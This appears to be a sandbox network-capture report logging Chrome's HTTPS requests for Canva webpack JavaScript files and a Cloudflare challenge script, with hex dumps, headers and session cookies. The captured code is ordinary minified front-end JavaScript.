                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 64 65 72 54 6f 70 3a 22 70 43 5f 49 56 77 22 2c 73 74 61 6e 64 61 72 64 42 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 22 58 51 4b 47 55 77 22 2c 63 72 69 74 69 63 61 6c 42 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 22 6d 32 46 54 78 41 22 2c 6c 6f 77 42 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 22 72 39 6d 35 51 41 22 2c 6e 6f 6e 65 42 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 22 71 54 78 75 56 41 22 2c 73 74 61 6e 64 61 72 64 42 6f 72 64 65 72 53 74 61 72 74 3a 22 5f 34 55 39 4b 65 51 22 2c 63 72 69 74 69 63 61 6c 42 6f 72 64 65 72 53 74 61 72 74 3a 22 73 4d 30 57 7a 77 22 2c 6c 6f 77 42 6f 72 64 65 72 53 74 61 72 74 3a 22 6d 45 66 55 6e 51 22 2c 6e 6f 6e 65 42 6f 72 64 65 72 53 74 61 72 74 3a 22 52 4d 33 5f 6b 51 22 2c 73 74 61 6e 64 61 72 64 42 6f 72 64 65 72 45 6e 64 3a 22 5f
                                                                                                                                                                                                                                                                    Data Ascii: derTop:"pC_IVw",standardBorderBottom:"XQKGUw",criticalBorderBottom:"m2FTxA",lowBorderBottom:"r9m5QA",noneBorderBottom:"qTxuVA",standardBorderStart:"_4U9KeQ",criticalBorderStart:"sM0Wzw",lowBorderStart:"mEfUnQ",noneBorderStart:"RM3_kQ",standardBorderEnd:"_
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 3a 65 2c 2e 2e 2e 66 7d 3d 61 3b 61 3d 66 2e 64 69 73 70 6c 61 79 3b 63 6f 6e 73 74 20 67 3d 66 2e 70 61 64 64 69 6e 67 2c 68 3d 66 2e 79 45 2c 6b 3d 66 2e 57 58 2c 6c 3d 66 2e 70 61 64 64 69 6e 67 54 6f 70 2c 6d 3d 66 2e 70 61 64 64 69 6e 67 42 6f 74 74 6f 6d 2c 6e 3d 66 2e 6f 36 2c 70 3d 66 2e 76 7a 61 2c 71 3d 66 2e 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3b 76 61 72 20 72 3d 66 2e 66 6c 65 78 57 72 61 70 2c 75 3d 66 2e 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3b 63 6f 6e 73 74 20 76 3d 66 2e 61 6c 69 67 6e 49 74 65 6d 73 2c 78 3d 66 2e 52 49 62 2c 79 3d 66 2e 53 49 62 3b 76 61 72 20 7a 3d 28 7a 3d 66 2e 62 61 63 6b 67 72 6f 75 6e 64 29 3f 4f 72 61 5b 60 24 7b 7a 7d 42 61 63 6b 67 72 6f 75 6e 64 60 5d 3a 6e 75 6c 6c 3b 76 61 72 20 43 3d 28 43 3d 66 2e
                                                                                                                                                                                                                                                                    Data Ascii: :e,...f}=a;a=f.display;const g=f.padding,h=f.yE,k=f.WX,l=f.paddingTop,m=f.paddingBottom,n=f.o6,p=f.vza,q=f.flexDirection;var r=f.flexWrap,u=f.justifyContent;const v=f.alignItems,x=f.RIb,y=f.SIb;var z=(z=f.background)?Ora[`${z}Background`]:null;var C=(C=f.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 65 6e 74 60 5d 3a 5a 69 5b 60 24 7b 75 7d 46 6c 65 78 4a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 60 5d 3a 6e 75 6c 6c 2c 76 3f 22 66 6c 65 78 22 21 3d 3d 61 7c 7c 22 73 74 61 72 74 22 21 3d 3d 76 26 26 22 65 6e 64 22 21 3d 3d 76 3f 5a 69 5b 60 24 7b 76 7d 41 6c 69 67 6e 49 74 65 6d 73 60 5d 3a 0a 5a 69 5b 60 24 7b 76 7d 46 6c 65 78 41 6c 69 67 6e 49 74 65 6d 73 60 5d 3a 6e 75 6c 6c 2c 42 72 61 28 22 66 6c 65 78 22 2c 78 29 2c 42 72 61 28 22 67 72 69 64 22 2c 79 29 29 3b 61 3d 7b 2e 2e 2e 28 61 26 26 58 69 28 51 72 61 2c 61 29 29 2c 2e 2e 2e 28 67 26 26 58 69 28 52 72 61 2c 67 2c 66 6a 29 29 2c 2e 2e 2e 28 68 26 26 58 69 28 53 72 61 2c 68 2c 66 6a 29 29 2c 2e 2e 2e 28 6b 26 26 58 69 28 54 72 61 2c 6b 2c 66 6a 29 29 2c 2e 2e 2e 28 6c 26 26 58 69 28 55 72 61
                                                                                                                                                                                                                                                                    Data Ascii: ent`]:Zi[`${u}FlexJustifyContent`]:null,v?"flex"!==a||"start"!==v&&"end"!==v?Zi[`${v}AlignItems`]:Zi[`${v}FlexAlignItems`]:null,Bra("flex",x),Bra("grid",y));a={...(a&&Xi(Qra,a)),...(g&&Xi(Rra,g,fj)),...(h&&Xi(Sra,h,fj)),...(k&&Xi(Tra,k,fj)),...(l&&Xi(Ura
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 5f 63 2e 6d 6a 3d 68 6a 28 28 7b 77 69 64 74 68 3a 61 3d 22 66 6c 75 69 64 22 2c 63 68 69 6c 64 72 65 6e 3a 62 2c 74 61 67 4e 61 6d 65 3a 63 3d 22 64 69 76 22 2c 72 6f 6c 65 3a 64 7d 2c 65 29 3d 3e 64 6a 28 63 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 62 6a 28 22 61 44 63 36 59 67 22 2c 44 72 61 28 61 29 29 2c 73 74 79 6c 65 3a 43 72 61 28 61 29 3f 7b 22 2d 2d 4a 36 73 6f 52 41 22 3a 61 7d 3a 6e 75 6c 6c 2c 72 6f 6c 65 3a 64 2c 72 65 66 3a 65 2c 63 68 69 6c 64 72 65 6e 3a 62 7d 29 29 3b 67 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 50 6d 4b 30 4d 41 22 2c 63 67 3a 22 2d 2d 46 47 31 48 69 51 22 2c 42 67 3a 22 2d 2d 5a 44 6b 5f 51 51 22 2c 7a 67 3a 22 2d 2d 75 51 77 4e 63 77 22 7d 3b 68 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 5a 5f 4d 69 71 67 22 2c 63 67
                                                                                                                                                                                                                                                                    Data Ascii: _c.mj=hj(({width:a="fluid",children:b,tagName:c="div",role:d},e)=>dj(c,{className:bj("aDc6Yg",Dra(a)),style:Cra(a)?{"--J6soRA":a}:null,role:d,ref:e,children:b}));gsa={default:"--PmK0MA",cg:"--FG1HiQ",Bg:"--ZDk_QQ",zg:"--uQwNcw"};hsa={default:"--Z_Miqg",cg
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 2d 2d 70 32 6f 32 56 67 22 2c 42 67 3a 22 2d 2d 65 38 74 45 30 41 22 2c 7a 67 3a 22 2d 2d 4e 51 48 47 73 67 22 7d 3b 72 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 53 38 77 69 49 41 22 2c 63 67 3a 22 2d 2d 6c 39 61 72 32 51 22 2c 42 67 3a 22 2d 2d 43 63 42 68 32 67 22 2c 7a 67 3a 22 2d 2d 74 4b 65 57 71 51 22 7d 3b 73 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 50 73 45 61 75 77 22 2c 63 67 3a 22 2d 2d 33 6c 31 52 45 51 22 2c 42 67 3a 22 2d 2d 67 4c 66 65 44 41 22 2c 7a 67 3a 22 2d 2d 75 46 69 69 34 51 22 7d 3b 74 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d 2d 51 72 62 4a 55 41 22 2c 63 67 3a 22 2d 2d 30 2d 57 2d 68 77 22 2c 42 67 3a 22 2d 2d 5a 52 6d 70 44 41 22 2c 7a 67 3a 22 2d 2d 64 51 53 5f 64 41 22 7d 3b 75 73 61 3d 7b 64 65 66 61 75 6c 74 3a 22 2d
                                                                                                                                                                                                                                                                    Data Ascii: --p2o2Vg",Bg:"--e8tE0A",zg:"--NQHGsg"};rsa={default:"--S8wiIA",cg:"--l9ar2Q",Bg:"--CcBh2g",zg:"--tKeWqQ"};ssa={default:"--PsEauw",cg:"--3l1REQ",Bg:"--gLfeDA",zg:"--uFii4Q"};tsa={default:"--QrbJUA",cg:"--0-W-hw",Bg:"--ZRmpDA",zg:"--dQS_dA"};usa={default:"-


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    59192.168.2.1249784104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC615OUTGET /web/950e236801028122.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:41 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 6002
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595115db0b8c11-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49981
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "3dff60ff0a6bbd8440a5a22444dbb88c"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:27 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:20 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: IzRjHMiIOmngm74baIVV0dZ7nQK5I1zaJxytyHmySq1/YJGuyH9rEr+NmBZqIoXieSSz27fOeRk=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8TQVEY934C5803
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: bGIQzYxmSw0wQnH..A9IM1mYOESDGDeW
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 46 48 41 35 69 67 4d 54 45 38 72 61 72 45 6b 33 75 4f 4d 25 32 46 67 53 6a 73 6b 6b 34 41 6b 48 69 46 61 49 37 36 25 32 42 47 36 38 70 68 55 46 58 64 30 78 4e 76 50 55 31 30 6e 61 6c 30 77 4a 6a 4d 68 25 32 46 54 45 31 51 46 4c 25 32 46 69 4e 45 72 56 61 55 56 64 45 4f 49 73 52 71 4d 77 70 35 51 63 7a 65 25 32 46 4a 47 4d 76 47 33 47 25 32 42 6d 48 48 32 44 4e 62 43 68 59 48 6d 67 6f 6d 67 49 39 55 59 63 58 76 4c 51 67 45 77 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FHA5igMTE8rarEk3uOM%2FgSjskk4AkHiFaI76%2BG68phUFXd0xNvPU10nal0wJjMh%2FTE1QFL%2FiNErVaUVdEOIsRqMwp5Qcze%2FJGMvG3G%2BmHH2DNbChYHmgomgI9UYcXvLQgEw%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1193INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 33 38 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 30 31 30 39 39 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3389],{/***/ 201099:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 60 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 5f 63 2e 64 7a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 30 3d 3d 3d 61 2e 70 61 72 61 6d 73 2e 73 69 7a 65 29 72 65 74 75 72 6e 20 61 2e 70 61 74 68 3b 63 6f 6e 73 74 20 62 3d 41 72 72 61 79 2e 66 72 6f 6d 28 61 2e 70 61 72 61 6d 73 2e 65 6e 74 72 69 65 73 28 29 29 2e 6d 61 70 28 28 5b 63 2c 64 5d 29 3d 3e 21 30 3d 3d 3d 64 3f 60 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 63 29 7d 60 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 64 29 3f 64 2e 6d 61 70 28 65 3d 3e 60 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 63 29 7d 3d 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 29 7d 60 29 2e 6a 6f 69 6e 28 22 26 22 29 3a 60 24 7b 65 6e 63 6f 64 65 55 52 49
                                                                                                                                                                                                                                                                    Data Ascii: `);return a};__c.dz=function(a){if(0===a.params.size)return a.path;const b=Array.from(a.params.entries()).map(([c,d])=>!0===d?`${encodeURIComponent(c)}`:Array.isArray(d)?d.map(e=>`${encodeURIComponent(c)}=${encodeURIComponent(e)}`).join("&"):`${encodeURI
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 22 2c 32 30 29 2c 59 5a 62 3a 4f 61 28 22 70 72 6f 64 75 63 74 56 61 72 69 61 6e 74 22 2c 0a 32 31 2c 5f 5f 63 2e 50 4f 61 29 2c 50 61 3a 54 28 22 64 6f 63 75 6d 65 6e 74 49 64 22 2c 32 39 29 2c 4b 6d 3a 54 28 22 64 6f 63 75 6d 65 6e 74 45 78 74 65 6e 73 69 6f 6e 22 2c 33 30 29 2c 6f 62 3a 47 28 22 64 6f 63 75 6d 65 6e 74 43 6f 6e 74 65 6e 74 22 2c 31 37 2c 51 4f 61 29 2c 48 64 62 3a 54 28 22 64 6f 63 75 6d 65 6e 74 43 61 74 65 67 6f 72 79 22 2c 32 34 29 2c 4c 79 62 3a 57 28 22 73 75 70 70 6f 72 74 45 72 72 6f 72 52 65 73 70 6f 6e 73 65 22 2c 31 39 29 2c 6b 78 61 3a 57 28 22 6d 69 6e 74 41 74 74 22 2c 32 32 29 2c 70 33 62 3a 47 28 22 73 69 67 6e 75 70 4d 65 64 69 61 22 2c 33 32 2c 52 4f 61 29 2c 4f 64 3a 47 28 22 72 69 73 6b 43 6f 6e 74 65 78 74 22 2c 33
                                                                                                                                                                                                                                                                    Data Ascii: ",20),YZb:Oa("productVariant",21,__c.POa),Pa:T("documentId",29),Km:T("documentExtension",30),ob:G("documentContent",17,QOa),Hdb:T("documentCategory",24),Lyb:W("supportErrorResponse",19),kxa:W("mintAtt",22),p3b:G("signupMedia",32,ROa),Od:G("riskContext",3
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1369INData Raw: 74 79 70 65 3a 44 28 22 41 3f 22 2c 32 2c 22 50 48 4f 4e 45 22 29 2c 74 63 3a 51 28 31 31 29 7d 29 29 3b 5f 5f 63 2e 63 50 61 3d 4c 28 28 29 3d 3e 28 7b 2e 2e 2e 6e 7a 28 29 2c 74 79 70 65 3a 44 28 22 41 3f 22 2c 33 2c 22 45 4d 41 49 4c 22 29 2c 65 6d 61 69 6c 3a 51 28 31 31 29 7d 29 29 3b 5f 5f 63 2e 64 50 61 3d 4c 28 28 29 3d 3e 28 7b 2e 2e 2e 6e 7a 28 29 2c 74 79 70 65 3a 44 28 22 41 3f 22 2c 36 2c 22 55 53 45 52 22 29 2c 75 73 65 72 3a 51 28 31 32 29 7d 29 29 3b 5f 5f 63 2e 65 50 61 3d 5f 5f 63 2e 5a 61 28 28 29 3d 3e 28 7b 74 79 70 65 3a 5b 32 2c 5f 5f 63 2e 62 50 61 2c 33 2c 5f 5f 63 2e 63 50 61 2c 36 2c 5f 5f 63 2e 64 50 61 5d 7d 29 2c 6e 7a 29 3b 5f 5f 63 2e 6f 7a 3d 28 29 3d 3e 28 7b 67 5a 3a 54 28 32 29 2c 4f 64 3a 45 28 31 34 2c 68 7a 29 2c 56
                                                                                                                                                                                                                                                                    Data Ascii: type:D("A?",2,"PHONE"),tc:Q(11)}));__c.cPa=L(()=>({...nz(),type:D("A?",3,"EMAIL"),email:Q(11)}));__c.dPa=L(()=>({...nz(),type:D("A?",6,"USER"),user:Q(12)}));__c.ePa=__c.Za(()=>({type:[2,__c.bPa,3,__c.cPa,6,__c.dPa]}),nz);__c.oz=()=>({gZ:T(2),Od:E(14,hz),V
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC702INData Raw: 54 45 5f 43 48 41 52 47 45 22 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 22 53 45 4e 44 5f 56 45 52 49 46 49 43 41 54 49 4f 4e 22 3b 63 61 73 65 20 37 3a 72 65 74 75 72 6e 22 53 45 4e 44 5f 4f 54 50 22 3b 63 61 73 65 20 39 3a 72 65 74 75 72 6e 22 43 4f 4e 54 45 4e 54 5f 53 48 41 52 45 22 3b 63 61 73 65 20 31 30 3a 72 65 74 75 72 6e 22 53 45 4e 44 5f 49 4e 56 49 54 41 54 49 4f 4e 22 3b 63 61 73 65 20 38 3a 72 65 74 75 72 6e 22 53 54 41 52 54 5f 57 45 42 41 55 54 48 4e 5f 41 53 53 45 52 54 49 4f 4e 22 3b 63 61 73 65 20 31 31 3a 72 65 74 75 72 6e 22 53 45 4e 44 5f 50 41 53 53 57 4f 52 44 5f 52 45 53 45 54 5f 43 4f 44 45 22 3b 63 61 73 65 20 31 32 3a 72 65 74 75 72 6e 22 52 45 53 45 54 5f 50 41 53 53 57 4f 52 44 22 3b 63 61 73 65 20 31 33 3a 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                    Data Ascii: TE_CHARGE";case 6:return"SEND_VERIFICATION";case 7:return"SEND_OTP";case 9:return"CONTENT_SHARE";case 10:return"SEND_INVITATION";case 8:return"START_WEBAUTHN_ASSERTION";case 11:return"SEND_PASSWORD_RESET_CODE";case 12:return"RESET_PASSWORD";case 13:return


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    60192.168.2.1249785104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1383OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC776INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:41 GMT
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    location: /cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js?
                                                                                                                                                                                                                                                                    cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gh0UvGtZQHbjF5hVQjhwcllk9%2BPSssWmpLDivJyQ515a2pfdmnmffdZeQ70ZTEKlbQC%2BIkQ%2FSNRmFSlkg2MaKOLKi0o1bpohq7TROmlc9z6Z6erE%2BBQHrYH8JDdLX4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e595115dba78ca2-EWR


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    61192.168.2.1249786104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC615OUTGET /web/107bbcd1676c194c.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:41 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:41 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 5461
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951164b5c424b-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49981
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "d258a53d8e3b3337f4ad038beb8df26a"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:27 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:12 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: OyauOCretHHn5GlRIfiOBTHs3hVuTgndWHFgziiZZaS5JnbL/PKqeY0+6wodjf7ZUXl4SfxyEFc=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8QE4W10B5KR4AN
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
